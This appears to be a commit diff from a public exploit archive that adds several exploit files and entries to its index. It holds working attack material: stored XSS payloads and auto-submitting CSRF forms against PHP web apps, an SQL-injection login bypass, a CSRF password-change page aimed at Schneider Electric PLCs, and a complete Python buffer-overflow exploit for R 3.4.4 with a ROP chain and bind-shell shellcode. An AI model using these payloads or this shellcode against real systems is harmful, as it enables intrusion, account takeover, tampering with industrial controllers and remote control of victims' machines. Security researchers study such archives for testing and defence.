# Exploit Title: Model Agency Media House & Model Gallery 1.0 - Persistent Cross-Site Scripting / Cross-Site Request Forgery / Authentication bypass
# Date: 2018-05-21
# Exploit Author: Borna nematzadeh (L0RD) or borna.nematzadeh123@gmail.com
# Vendor Homepage: https://codecanyon.net/item/model-agency-media-house-model-gallery/16927610?s_rank=29
# Version: 1.0
# Tested on: Kali linux
# Description:
#Model Agency - Media House & Model Gallery 1.0 suffers from multiple vulnerabilities :
# POC 1 : Persistent cross site scripting :
1) After creating an account , go to your profile.
2) Navigate to "Update profile" and put this payload :
"/><script>alert(document.domain)</script>
3) You will have an alert box in the page .
# POC 2 : CSRF : cross site request forgery :
# User's CSRF exploit :
<html>
<head>
<title>CSRF POC</title>
</head>
<body>
<form action="http://model.thesoftking.com/updateprofile"
method="post">
<input type="hidden" name="name" value="anything">
<input type="hidden" name="mobile" value="200000">
<input type="hidden" name="address" value="anything">
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
# Admin page CSRF exploit :
<form action="http://model.thesoftking.com/admin/setgeneral.php"
method="post">
<input name="name" value="test" type="hidden">
<input name="wcmsg" value="test" type="hidden">
<input name="address" value="test2" type="hidden">
<input name="mobile" value="1000000" type="hidden">
<input name="email" value="test@test.com" type="hidden">
<input name="currency" value="decode" type="hidden">
</form>
<script>
document.forms[0].submit();
</script>
# POC 3 : Authentication bypass :
# Attacker can bypass admin panel without any authentication :
Path : /admin
Username : ' or 0=0 #
Password : anything

12
exploits/php/webapps/44683.txt Normal file
View file

@ -0,0 +1,12 @@
# Exploit Title: Wchat - Fully Responsive PHP AJAX Chat Script 1.5 - Persistent cross site scripting
# Date: 2018-05-21
# Exploit Author: Borna nematzadeh (L0RD)
# Vendor Homepage: https://codecanyon.net/item/wchat-fully-responsive-phpajax-chat/18047319?s_rank=1327
# Version: 1.5
# Tested on: Windows
# POC :
1) Create your account and navigate to "Edit profile"
2) Put this payload into textarea :
</textarea><script>console.log(document.cookie)</script>
3) The payload will be executed if someone opens your profile .

103
exploits/windows/webapps/44678.txt Normal file
View file

@ -0,0 +1,103 @@
# Exploit Title: Schneider Electric PLCs - Cross-Site Request Forgery
# Date: 2018-05-12
# Exploit Author: t4rkd3vilz
# Vendor Homepage: http://www.schneider-electric.com/
# Tested on: Windows
# CVE: CVE-2013-0663
# Version: Schneider Electric Quantum PLC: 140NOE77111, 140NOE77101, 140NWM10000
# Modicon M340 PLC: BMXNOC0401, BMXNOE0100x, BMXNOE011xx
# Premium PLC: TSXETY4103, TSXETY5103, and TSXWMY100
# Category: webapps
<html>
<head>
<title>CSRF POC</title>
</head>
<body>
<form method="get" action="http://TargetIP/secure/embedded/builtin" name="sample" onSubmit="return validateForm()">
<table border="0" cellspacing="0" cellpadding="0" width="300" style="height: 100" bgcolor="#C0C0C0">
<tr>
<td class="inputCell" width="200">
<div align="left">
<h5>Name:</h5>
<script language="javascript" type="text/javascript">
<!--//
paramLang();
switch(getLanguage())
{
default:
document.write("Username :"); break;
}
//-->
</script>
</div>
</td>
<td class="inputCell" width="190">
<input type="text" name="user" size="20">
</td>
</tr>
<tr>
<td class="inputCell" width="200">
<div align="left">&
<h5>Pass:</h5>
<script language="javascript" type="text/javascript">
<!--//
switch(getLanguage())
{
default:
document.write("New password :"); break;
}
//-->
</script>
</div>
</td>
<td class="inputCell" width="190">
<input type="password" name="passwd" size="20">
</td>
</tr>
<tr>
<td class="inputCell" width="200">
<div align="left">
<h5>Verify Pass:</h5>
<script language="javascript" type="text/javascript">
<!--//
switch(getLanguage())
{
default:
document.write("Confirm password :"); break;
}
//-->
</script>
</div>
</td>
<td class="inputCell" width="190">
<input type="password" name="cnfpasswd" size="20">
</td>
</tr>
</table>
<br>
<div align="center">
<script language="javascript" type="text/javascript">
<!--//
switch(getLanguage())
{
default:
document.write('<input type="submit" name="subhttppwd" value="Change Password">'); break;
}
//-->
</script>
<input type="submit" name="subhttppwd" value="Change Password">
</div>
</form>
<br>
</td>
</tr>
<tr>
<td align="center">
<br>
</body>
</html>

132
exploits/windows_x86/local/44680.py Executable file
View file

@ -0,0 +1,132 @@
# Exploit Title: R v3.4.4 - Local Buffer Overflow (DEP Bypass)
# Exploit Author: Hashim Jawad
# Exploit Date: 2018-05-21
# Vendor Homepage: https://www.r-project.org/
# Vulnerable Software: https://www.exploit-db.com/apps/a642a3de7b5c2602180e73f4c04b4fbd-R-3.4.4-win.exe
# Tested on OS: Microsoft Windows 7 Enterprise - SP1 (x86)
# Steps to reproduce: under GUI preferences, paste payload.txt contents into 'Language for menus and messages'
# Credit to bzyo for finding the bug (44516)
#!/usr/bin/python
import struct
#root@kali:~# msfvenom -p windows/shell_bind_tcp -e x86/alpha_mixed -b "\x00\x0a\x0d\x0e" -f python -v shellcode
#Payload size: 718 bytes
shellcode = ""
shellcode += "\x89\xe0\xdb\xd2\xd9\x70\xf4\x5b\x53\x59\x49\x49"
shellcode += "\x49\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43"
shellcode += "\x43\x43\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30"
shellcode += "\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30"
shellcode += "\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
shellcode += "\x69\x6c\x59\x78\x6c\x42\x77\x70\x33\x30\x37\x70"
shellcode += "\x31\x70\x6b\x39\x6a\x45\x65\x61\x39\x50\x72\x44"
shellcode += "\x6e\x6b\x30\x50\x56\x50\x4e\x6b\x62\x72\x56\x6c"
shellcode += "\x6c\x4b\x31\x42\x34\x54\x4c\x4b\x62\x52\x64\x68"
shellcode += "\x56\x6f\x68\x37\x70\x4a\x61\x36\x55\x61\x79\x6f"
shellcode += "\x6e\x4c\x75\x6c\x73\x51\x51\x6c\x67\x72\x46\x4c"
shellcode += "\x57\x50\x4b\x71\x5a\x6f\x36\x6d\x76\x61\x6b\x77"
shellcode += "\x7a\x42\x39\x62\x76\x32\x73\x67\x6e\x6b\x36\x32"
shellcode += "\x72\x30\x4e\x6b\x73\x7a\x55\x6c\x4e\x6b\x62\x6c"
shellcode += "\x42\x31\x72\x58\x38\x63\x51\x58\x35\x51\x6b\x61"
shellcode += "\x52\x71\x4e\x6b\x72\x79\x31\x30\x57\x71\x78\x53"
shellcode += "\x6c\x4b\x50\x49\x64\x58\x6b\x53\x77\x4a\x70\x49"
shellcode += "\x6e\x6b\x37\x44\x4e\x6b\x67\x71\x4b\x66\x45\x61"
shellcode += "\x69\x6f\x6c\x6c\x49\x51\x6a\x6f\x46\x6d\x57\x71"
shellcode += "\x5a\x67\x56\x58\x39\x70\x42\x55\x4b\x46\x74\x43"
shellcode += "\x53\x4d\x59\x68\x35\x6b\x73\x4d\x47\x54\x64\x35"
shellcode += "\x5a\x44\x36\x38\x6c\x4b\x56\x38\x57\x54\x76\x61"
shellcode += "\x38\x53\x43\x56\x4c\x4b\x64\x4c\x30\x4b\x6c\x4b"
shellcode += "\x33\x68\x35\x4c\x57\x71\x59\x43\x6c\x4b\x36\x64"
shellcode += "\x6c\x4b\x46\x61\x4e\x30\x6b\x39\x63\x74\x47\x54"
shellcode += "\x55\x74\x31\x4b\x43\x6b\x50\x61\x71\x49\x52\x7a"
shellcode += "\x62\x71\x6b\x4f\x6b\x50\x61\x4f\x51\x4f\x32\x7a"
shellcode += "\x6c\x4b\x66\x72\x5a\x4b\x4c\x4d\x71\x4d\x50\x68"
shellcode += "\x76\x53\x45\x62\x65\x50\x75\x50\x31\x78\x73\x47"
shellcode += "\x71\x63\x74\x72\x31\x4f\x62\x74\x75\x38\x50\x4c"
shellcode += "\x70\x77\x55\x76\x36\x67\x49\x6f\x6b\x65\x6d\x68"
shellcode += "\x7a\x30\x73\x31\x55\x50\x65\x50\x36\x49\x78\x44"
shellcode += "\x33\x64\x62\x70\x65\x38\x65\x79\x6d\x50\x30\x6b"
shellcode += "\x43\x30\x39\x6f\x39\x45\x31\x7a\x56\x68\x70\x59"
shellcode += "\x70\x50\x69\x72\x59\x6d\x37\x30\x70\x50\x71\x50"
shellcode += "\x50\x50\x33\x58\x39\x7a\x46\x6f\x79\x4f\x6d\x30"
shellcode += "\x59\x6f\x69\x45\x7a\x37\x75\x38\x65\x52\x43\x30"
shellcode += "\x37\x61\x63\x6c\x4f\x79\x5a\x46\x31\x7a\x34\x50"
shellcode += "\x30\x56\x31\x47\x45\x38\x39\x52\x79\x4b\x66\x57"
shellcode += "\x42\x47\x59\x6f\x5a\x75\x50\x57\x51\x78\x6c\x77"
shellcode += "\x48\x69\x54\x78\x69\x6f\x6b\x4f\x59\x45\x72\x77"
shellcode += "\x75\x38\x33\x44\x7a\x4c\x75\x6b\x39\x71\x49\x6f"
shellcode += "\x78\x55\x71\x47\x6c\x57\x75\x38\x70\x75\x70\x6e"
shellcode += "\x42\x6d\x35\x31\x79\x6f\x38\x55\x72\x48\x70\x63"
shellcode += "\x42\x4d\x71\x74\x37\x70\x4f\x79\x79\x73\x71\x47"
shellcode += "\x70\x57\x71\x47\x74\x71\x78\x76\x53\x5a\x42\x32"
shellcode += "\x62\x79\x52\x76\x6b\x52\x59\x6d\x35\x36\x79\x57"
shellcode += "\x52\x64\x35\x74\x57\x4c\x37\x71\x43\x31\x4e\x6d"
shellcode += "\x50\x44\x36\x44\x56\x70\x59\x56\x47\x70\x42\x64"
shellcode += "\x46\x34\x70\x50\x36\x36\x50\x56\x50\x56\x71\x56"
shellcode += "\x42\x76\x30\x4e\x73\x66\x76\x36\x66\x33\x76\x36"
shellcode += "\x32\x48\x42\x59\x68\x4c\x55\x6f\x6d\x56\x49\x6f"
shellcode += "\x6b\x65\x4b\x39\x59\x70\x72\x6e\x70\x56\x51\x56"
shellcode += "\x4b\x4f\x34\x70\x51\x78\x34\x48\x4e\x67\x37\x6d"
shellcode += "\x51\x70\x59\x6f\x38\x55\x6d\x6b\x6c\x30\x48\x35"
shellcode += "\x69\x32\x72\x76\x62\x48\x4c\x66\x5a\x35\x4f\x4d"
shellcode += "\x4d\x4d\x69\x6f\x4a\x75\x65\x6c\x67\x76\x73\x4c"
shellcode += "\x47\x7a\x4f\x70\x59\x6b\x4b\x50\x70\x75\x57\x75"
shellcode += "\x6f\x4b\x53\x77\x55\x43\x64\x32\x52\x4f\x51\x7a"
shellcode += "\x53\x30\x46\x33\x4b\x4f\x4b\x65\x41\x41"
'''
Output generated by mona.py v2.0, rev 582 - Immunity Debugger
--------------------------------------------
Register setup for VirtualProtect() :
--------------------------------------------
EAX = NOP (0x90909090)
ECX = lpOldProtect (ptr to W address)
EDX = NewProtect (0x40)
EBX = dwSize
ESP = lPAddress (automatic)
EBP = ReturnTo (ptr to jmp esp)
ESI = ptr to VirtualProtect()
EDI = ROP NOP (RETN)
--------------------------------------------
'''
rop = struct.pack('<L', 0x6cacc7e2) # POP EAX # RETN [R.dll]
rop += struct.pack('<L', 0x643cb170) # ptr to &VirtualProtect() [IAT Riconv.dll]
rop += struct.pack('<L', 0x6e7d5435) # MOV EAX,DWORD PTR DS:[EAX] # RETN [utils.dll]
rop += struct.pack('<L', 0x6ca347fa) # XCHG EAX,ESI # RETN [R.dll]
rop += struct.pack('<L', 0x6cb7429a) # POP EBP # RETN [R.dll]
rop += struct.pack('<L', 0x6ca2a9bd) # & jmp esp [R.dll]
rop += struct.pack('<L', 0x64c45db2) # POP EAX # RETN [methods.dll]
rop += struct.pack('<L', 0xfffffaff) # value to negate, will become 0x00000501
rop += struct.pack('<L', 0x643c361a) # NEG EAX # RETN [Riconv.dll]
rop += struct.pack('<L', 0x6ca33b8a) # XCHG EAX,EBX # RETN [R.dll]
rop += struct.pack('<L', 0x6cbef3e4) # POP EAX # RETN [R.dll]
rop += struct.pack('<L', 0xffffffc0) # Value to negate, will become 0x00000040
rop += struct.pack('<L', 0x6ff3a39a) # NEG EAX # RETN [grDevices.dll]
rop += struct.pack('<L', 0x6ca558be) # XCHG EAX,EDX # RETN [R.dll]
rop += struct.pack('<L', 0x6cbe90a8) # POP ECX # RETN [R.dll]
rop += struct.pack('<L', 0x6ff863c1) # &Writable location [grDevices.dll]
rop += struct.pack('<L', 0x6cbe097f) # POP EDI # RETN [R.dll]
rop += struct.pack('<L', 0x6375fe5c) # RETN (ROP NOP) [Rgraphapp.dll]
rop += struct.pack('<L', 0x6c998f58) # POP EAX # RETN [R.dll]
rop += struct.pack('<L', 0x90909090) # nop
rop += struct.pack('<L', 0x6fedfa6c) # PUSHAD # RETN [grDevices.dll]
buffer = '\x41' * 292 # filler to EIP
buffer += struct.pack('<L', 0x6fef93c6) # POP ESI # RETN [grDevices.dll]
buffer += '\x41' * 4 # compensate for pop esi
buffer += rop
buffer += '\x90' * 50
buffer += shellcode
buffer += '\x90' * (5000-292-4-4-len(rop)-50-len(shellcode))
try:
f=open('payload.txt','w')
print '[+] Creating %s bytes evil payload..' %len(buffer)
f.write(buffer)
f.close()
print '[+] File created!'
except Exception as e:
print e

0
exploits/linux/webapps/44430.txt → exploits/xml/webapps/44430.txt
View file

21
files_exploits.csv
View file

@ -9722,6 +9722,8 @@ id,file,description,date,author,type,platform,port
44652,exploits/linux/local/44652.py,"DynoRoot DHCP - Client Command Injection",2018-05-18,"Kevin Kirsche",local,linux,
44654,exploits/linux/local/44654.rb,"Linux 4.8.0 < 4.8.0-46 - AF_PACKET packet_set_ring Privilege Escalation (Metasploit)",2018-05-18,Metasploit,local,linux,
44658,exploits/windows/local/44658.py,"Easy MPEG to DVD Burner 1.7.11 - Local Buffer Overflow (SEH) (DEP Bypass)",2018-05-20,"Juan Prescotto",local,windows,
44677,exploits/linux/local/44677.rb,"Linux 2.6.30 < 2.6.36-rc8 - Reliable Datagram Sockets (RDS) Privilege Escalation (Metasploit)",2018-05-21,Metasploit,local,linux,
44680,exploits/windows_x86/local/44680.py,"R 3.4.4 - Local Buffer Overflow (DEP Bypass)",2018-05-21,"Hashim Jawad",local,windows_x86,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -39248,7 +39250,7 @@ id,file,description,date,author,type,platform,port
44424,exploits/php/webapps/44424.txt,"Yahei PHP Prober 0.4.7 - Cross-Site Scripting",2018-04-09,ManhNho,webapps,php,
44425,exploits/php/webapps/44425.txt,"WordPress Plugin Simple Fields 0.2 - 0.3.5 - Local/Remote File Inclusion / Remote Code Execution",2018-04-09,"Graeme Robinson",webapps,php,80
44429,exploits/json/webapps/44429.txt,"CyberArk Password Vault Web Access < 9.9.5 / < 9.10 / 10.1 - Remote Code Execution",2018-04-09,"RedTeam Pentesting",webapps,json,
44430,exploits/linux/webapps/44430.txt,"KYOCERA Multi-Set Template Editor 3.4 - Out-Of-Band XML External Entity Injection",2018-04-09,LiquidWorm,webapps,linux,
44430,exploits/xml/webapps/44430.txt,"KYOCERA Multi-Set Template Editor 3.4 - Out-Of-Band XML External Entity Injection",2018-04-09,LiquidWorm,webapps,xml,
44431,exploits/linux/webapps/44431.txt,"KYOCERA Net Admin 3.4 - Cross-Site Request Forgery (Add Admin)",2018-04-09,LiquidWorm,webapps,linux,
44432,exploits/php/webapps/44432.txt,"Buddypress Xprofile Custom Fields Type 2.6.3 - Remote Code Execution",2018-04-09,"Lenon Leite",webapps,php,
44433,exploits/php/webapps/44433.txt,"WooCommerce CSV-Importer-Plugin 3.3.6 - Remote Code Execution",2018-04-09,"Lenon Leite",webapps,php,
@ -39344,5 +39346,20 @@ id,file,description,date,author,type,platform,port
44650,exploits/hardware/webapps/44650.txt,"Cisco SA520W Security Appliance - Path Traversal",2018-05-18,"Nassim Asrir",webapps,hardware,
44655,exploits/linux/webapps/44655.txt,"SAP B2B / B2C CRM 2.x < 4.x - Local File Inclusion",2018-05-18,"Richard Alviarez",webapps,linux,
44657,exploits/hardware/webapps/44657.txt,"D-Link DSL-3782 - Authentication Bypass",2018-05-20,"Giulio Comi",webapps,hardware,
44659,exploits/jsp/webapps/44659.py,"Adobe Enterprise Manager (AEM) < 6.3 - Remote Code Execution",2018-05-20,StaticFlow,webapps,jsp,
44661,exploits/php/webapps/44661.txt,"Superfood 1.0 - Multiple Vulnerabilities",2018-05-21,L0RD,webapps,php,
44660,exploits/php/webapps/44660.txt,"Joomla! Component EkRishta 2.10 - Cross-Site Scripting / SQL Injection",2018-05-20,"Sina Kheirkhah",webapps,php,
44662,exploits/php/webapps/44662.txt,"Private Message PHP Script 2.0 - Persistent Cross-Site Scripting",2018-05-21,L0RD,webapps,php,
44663,exploits/php/webapps/44663.txt,"Flippy DamnFacts - Viral Fun Facts Sharing Script 1.1.0 - Persistent Cross-Site Scripting / Cross-Site Request Forgery",2018-05-21,L0RD,webapps,php,
44664,exploits/php/webapps/44664.txt,"Zenar Content Management System - Cross-Site Scripting",2018-05-21,"Berk Dusunur",webapps,php,
44668,exploits/java/webapps/44668.py,"GitBucket 4.23.1 - Remote Code Execution",2018-05-21,"Kacper Szurek",webapps,java,
44666,exploits/java/webapps/44666.txt,"ManageEngine Recovery Manager Plus 5.3 - Persistent Cross-Site Scripting",2018-05-21,"Ahmet Gurel",webapps,java,
44667,exploits/linux/webapps/44667.txt,"Siemens SIMATIC S7-1200 CPU - Cross-Site Request Forgery",2018-05-21,t4rkd3vilz,webapps,linux,
44671,exploits/hardware/webapps/44671.html,"Teradek VidiU Pro 3.0.3 - Cross-Site Request Forgery",2018-05-21,LiquidWorm,webapps,hardware,
44672,exploits/hardware/webapps/44672.txt,"Teradek VidiU Pro 3.0.3 - Server-Side Request Forgery",2018-05-21,LiquidWorm,webapps,hardware,
44675,exploits/hardware/webapps/44675.html,"Teradek Cube 7.3.6 - Cross-Site Request Forgery",2018-05-21,LiquidWorm,webapps,hardware,
44676,exploits/hardware/webapps/44676.html,"Teradek Slice 7.3.15 - Cross-Site Request Forgery",2018-05-21,LiquidWorm,webapps,hardware,
44678,exploits/windows/webapps/44678.txt,"Schneider Electric PLCs - Cross-Site Request Forgery",2018-05-21,t4rkd3vilz,webapps,windows,
44679,exploits/php/webapps/44679.txt,"Auto Dealership & Vehicle Showroom WebSys 1.0 - Persistent Cross-Site Scripting / Cross-Site Request Forgery / Admin Panel Authentication Bypass",2018-05-21,L0RD,webapps,php,
44681,exploits/linux/webapps/44681.txt,"Merge PACS 7.0 - Cross-Site Request Forgery",2018-05-21,"Safak Aslan",webapps,linux,
44682,exploits/php/webapps/44682.txt,"Model Agency Media House & Model Gallery 1.0 - Persistent Cross-Site Scripting / Cross-Site Request Forgery / Authentication Bypass",2018-05-21,L0RD,webapps,php,
44683,exploits/php/webapps/44683.txt,"Wchat PHP AJAX Chat Script 1.5 - Persistent Cross-Site Scripting",2018-05-21,L0RD,webapps,php,

Can't render this file because it is too large.